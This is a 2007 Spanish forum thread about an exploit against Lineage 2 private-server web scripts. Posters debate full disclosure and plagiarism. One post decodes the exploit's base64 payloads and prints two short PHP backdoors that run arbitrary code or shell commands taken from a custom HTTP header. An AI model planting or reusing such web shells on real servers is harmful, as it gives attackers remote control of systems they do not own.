Hackeando webs de Lineage 2 - video

Iniciado por codebreak, 2 Enero 2007, 01:28 AM

0 Miembros y 1 Visitante están viendo este tema.

Isirius

Au aqui tenemos el code si era cuestion de tiempo como siempre.

Bebbop

Me sorprende ver este tipo de cosas... vamos por partes...

Antes de nada yo tambien sigo mucho este foro aunque no participo activamente pero ver este tipo de cosas...

Soy administrador de un servidor l2j, tranquilo no uso el L2J Statistik, pero me parece imperdonable tu actitud ante esta situacion.

Te has puesto en contacto con el desarrollador para avisar del bug???? Has comentado algo a la cominidad l2j???? (No te molestes ya lo he hecho yo)

Me parece muy bien que descubras un bug y crees un exploit pero al menos la proxima vez avisa al desarrollador del fallo para que pueda, al menos y si quiere, corregirlo. 

No, ahora todo el mundo a bajarse el exploit y reventar servidores (abriendote una shell... ya me contaras lo que puedes hacer) asi por las buenas, con el trabajo que ya se tiene con que funcione el dichoso juego.

Y encima no contento con ello te niegas a postear el codigo por si te plagian el exploit??? Vamos que no das ni tan siquiera la posibilidad de corregir uno mismo el fallo...

En fin... sobre gustos colores...

Ah! Falta el codigo de la "codificacion" eso codigo que dices que no quieres postearlo y por algo lo has codificado... ejem... en base64????

base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspOyBpbmlfc2V0KG1heF9leGVjdXRpb25fdGltZSwwKTsgaWYoaXNzZXQoJF9TRVJWRVJbSFRUUF9IT0xBXSkpeyAgICRwaHAgPSBnZXRfbWFnaWNfcXVvdGVzX2dwYygpPyBzdHJpcHNsYXNoZXMoJF9TRVJWRVJbSFRUUF9IT0xBXSk6JF9TRVJWRVJbSFRUUF9IT0xBXTsgZXZhbCgkcGhwLlwiO1wiKTsgfSBkaWU7ID8+");


<?php 
  ob_clean
(); 
  echo(
codebreak); 
  
ini_set(max_execution_time,0); 
  if(isset(
$_SERVER[HTTP_HOLA])){ 
   
$php get_magic_quotes_gpc()?stripslashes($_SERVER[HTTP_HOLA]):$_SERVER[HTTP_HOLA]; 
   eval(
$php.\";\"); 
  } 
  die; 
?>


base64_decode("PD9waHAgb2JfY2xlYW4oKTsgZWNobyhjb2RlYnJlYWspO2luaV9zZXQobWF4X2V4ZWN1dGlvbl90aW1lLDApOyBwYXNzdGhydSgkX1NFUlZFUltIVFRQX0hPTEFdKTsgZGllOyA/

<?php 
  ob_clean
(); 
  echo(
codebreak); 
  
ini_set(max_execution_time,0); 
  
passthru($_SERVER[HTTP_HOLA]); 
  die; 
?>

EvilGoblin

El programa no puedo ejecutarlo desde el FUCKING windows XP de mi trabajo =P xD


asi q ^^ llego a casa y lo hago desde Back-Track =P


=) keria ver el Source ^^ para estar seguro =D

Muy buena idea!!! ^^

Buen aporte =)

Seguire de serca tus post en este foro ^^ en izhal y en elantro xD
Experimental Serial Lain [Linux User]

codebreak

#13
Cita de: Bebbop en  5 Enero 2007, 14:00 PM
Me sorprende ver este tipo de cosas... vamos por partes...

Antes de nada yo también sigo mucho este foro aunque no participo activamente pero ver este tipo de cosas...

Soy administrador de un servidor l2j, tranquilo no uso el L2J Statistik, pero me parece imperdonable tu actitud ante esta situacion.

Te has puesto en contacto con el desarrollador para avisar del bug???? Has comentado algo a la cominidad l2j???? (No te molestes ya lo he hecho yo)

Me parece muy bien que descubras un bug y crees un exploit pero al menos la proxima vez avisa al desarrollador del fallo para que pueda, al menos y si quiere, corregirlo. 

No, ahora todo el mundo a bajarse el exploit y reventar servidores (abriendote una shell... ya me contaras lo que puedes hacer) asi por las buenas, con el trabajo que ya se tiene con que funcione el dichoso juego.

Y encima no contento con ello te niegas a postear el codigo por si te plagian el exploit??? Vamos que no das ni tan siquiera la posibilidad de corregir uno mismo el fallo...

En fin... sobre gustos colores...

Ah! Falta el codigo de la "codificacion" eso codigo que dices que no quieres postearlo y por algo lo has codificado... ejem... en base64????


Bueno, si colocan el código ahi me da lo mismo. La cosa es que el trabajo de buscarlo al menos no lo hago yo.

A ver.. Quien me sorprende eres tu.
Te has puesto TU en contacto CONMIGO para saber si avise sobre el bug?.. NO. Estas hablando SIN SABER.

Me puse en contacto con los creadores de los principales packs que incluyen el script (Hero1711, Panter, L2j Dev, etc...) antes de hacer publico el exploit... asi que todo lo que dices no tiene sentido.

Y te crees muy experto por poder decodificar el base64 del exploit???, ajajajaj. No creas que me vas a venir a  impresionar cuando lo único que haces, es decodificar y encontrar algo que yo hice ajaja. Están en base64 para mayor comodidad, no para ocultar algo... de hecho me impresionaría unicamente si no lo puedes decodificar.

Era tan fácil encontrar el exploit como buscar su nombre en google e ingresar a la primera pagina que aparece listada, pues el source lo publique en la comunidad W4cking y en ningun otro lado. Asi que no te des merito.

Saludos,

PS: Uno de los casos del plagio lo puedes ver aca... para que por un minuto entiendas y respetes la opinion de los demás de publicar o no información. Te repito.. yo me comunique con distintos admins y creadores asi que porfavor, para de hacer afirmaciones sin fundamentos. Incluso, el video mismo fue hecho para que los admins que no consideraban peligroso el exploit tomen conciencia.

Original:
http://usuarios.lycos.es/changoleoni/cbreak.txt
Plagio:
http://decadence.inc.md/%5B-%20PHP%20Shells/utool.html

Parecidos??.
El ultimo  se hizo famoso y el primero (el original) paso al recuerdo.

En todo caso.. cree 2 exploits mas, para los dos sripts mas usados.. y ellos no han sido publicados. Dependera de que sucede con este exploit.. sin embargo.. ya avise su error a muchos admins. Pero supongo tu ya sabes eso no?, que pareces saber tanto sobre mi y lo que hago como para poder venirme a  juzgar.


W4ck1ng Team Member

CrackBubledMind

es terible que veamos esto en esta comu, pero amigo yo te entiendo lo que dices, y se que se siente que te roben un fuente y se hagan famoso a costa de algo tuyo, cuidate chico, cuidado con el gran hermano(papa noel) jajajaja
"Los angeles que han sido expulsados del cielo solamente pueden volverse demonios"

Bebbop

No te he preguntado porque simplemente he visto en otros foros como te reias por el hecho de que alguien tiraba abajo servidores, para mi ya dice mucho.

De conocerte no te conozco ni te juzgo lo que escribi lo hice a raiz de lo que he leido. http://www.antro.cl/comunidad/showthread.php?t=237252 Conozco varios desarrolladores de los diferentes data-packs y no me han comentado nada, en el foro de l2j tampoco hay nada al respecto y lo del base64 es por una pregunta que te hacen en otro foro.

Lo unico que no encontraba correcto era que pusieras un exploit de algo que se usa sin avisar a los desarrolladores que despues ya sabemos lo que pasa y se dedican a tirar servidores asi porque asi. Vuelvo a hacer referencia a otros foros y parece ser que la gente que te pregunta simplemente quiere hacer un deface o tirar el server abajo.

Lo dicho, si has avisado perfecto (lo has hecho en ragezone en el foro oficial de l2j no veo nada, o no se buscar) ya solo depende de los desarrolladores y de quien utilice esos scripts para solucionarlo.

En fin no queria ofenderte pero me calente al ver ciertos comentarios. Buen trabajo por encontrar el bug y hacer un exploit aunque no me ha parecido correcto la forma de publicarlo (tenias que haberlo complicado un "poco" mas para que no todo el mundo pudiera usarlo, no se si me entiendes).


codebreak

#16
Cita de: Bebbop en  7 Enero 2007, 23:29 PM
No te he preguntado porque simplemente he visto en otros foros como te reias por el hecho de que alguien tiraba abajo servidores, para mi ya dice mucho.

De conocerte no te conozco ni te juzgo lo que escribi lo hice a raiz de lo que he leido. http://www.antro.cl/comunidad/showthread.php?t=237252 Conozco varios desarrolladores de los diferentes data-packs y no me han comentado nada, en el foro de l2j tampoco hay nada al respecto y lo del base64 es por una pregunta que te hacen en otro foro.

Lo unico que no encontraba correcto era que pusieras un exploit de algo que se usa sin avisar a los desarrolladores que despues ya sabemos lo que pasa y se dedican a tirar servidores asi porque asi. Vuelvo a hacer referencia a otros foros y parece ser que la gente que te pregunta simplemente quiere hacer un deface o tirar el server abajo.

Lo dicho, si has avisado perfecto (lo has hecho en ragezone en el foro oficial de l2j no veo nada, o no se buscar) ya solo depende de los desarrolladores y de quien utilice esos scripts para solucionarlo.

En fin no queria ofenderte pero me calente al ver ciertos comentarios. Buen trabajo por encontrar el bug y hacer un exploit aunque no me ha parecido correcto la forma de publicarlo (tenias que haberlo complicado un "poco" mas para que no todo el mundo pudiera usarlo, no se si me entiendes).



No me reía de como tiraban abajo servidores.
Me reía del hecho de que a la semana de publicar un exploit, ya había un video de un grupo hacker de holanda que hacia uso de mi exploit para tirar 7 servidores en 30 minutos.

Que es lo gracioso?, el ver servidores abajo?. NO... el ver un video sobre mi exploit siendo explicado en un idioma casi ilegible. En todo caso, me puse en contacto con ellos para darles mi opinión.. pero denuevo digo:  estas asumiendo cosas y comentando fundándote en ellas.

En ragezone, no fui yo quien coloco la advertencia sino un amigo que es admin de servidores y le dije que lo coloque en el lugar que estime sea mas conveniente. Si no lo ves en el foro oficial de l2j fue para no publicitarlo... fue todo por pm. Principalmente porque?, pq el exploit no va a la versión 0.01 publicada ahi (la que tu advertiste), sino a la versión modificada y unida con ACM.

Saludos,

PS: Por algo la versión publicada en elantro esta protegida con contraseña. Si mi intención fuese el daño, seria estúpido hacer eso.


W4ck1ng Team Member

ANELKAOS

Haya paz chicos. chico es libre de seguie el "Full Disclosure" si le parece bien, a mi no me parece bien, solo es mi opinión personal, encuentro las cosas, las notifico si me afectan o me parecen graves y "nadie" se entera. Los desarrolladores tienen la obligación estar al día en las vulnerabilidades de su soft  revisando las listas de seguridad ya que son ellos quienes mejor lo conocen (o deberian conocer) pero no por ello se le pude reprochar a nadie que no notifique. ¿Cuantas vulnerabilidades existen sin reportarse? ¿Cuantos 0-days teneis cada uno de vosotros en la manga? Si nos ponemos a hacer de consultores gratuitamente hundimos el mercado de la seguridad  :D

Ademas un mundo perfecto no seria tan divertido jeje

PD: Bebbop me alegra verte por aquí :)

Bebbop

En eso te doy la razon, cada uno es libre de hacerlo como quiera, ahora revisando lo que he escrito veo que no he sido muy "cortes" (siempre peco de eso :P)

Por cierto, he visto que se ha publicado en la listas de seguridad.

pd.: hace mucho tiempo que visito el foro pero siempre ha sido en "modo bot"... por cierto, no sabia que tenias blog... me he enterado atraves del blog de Chema.




CrashIIX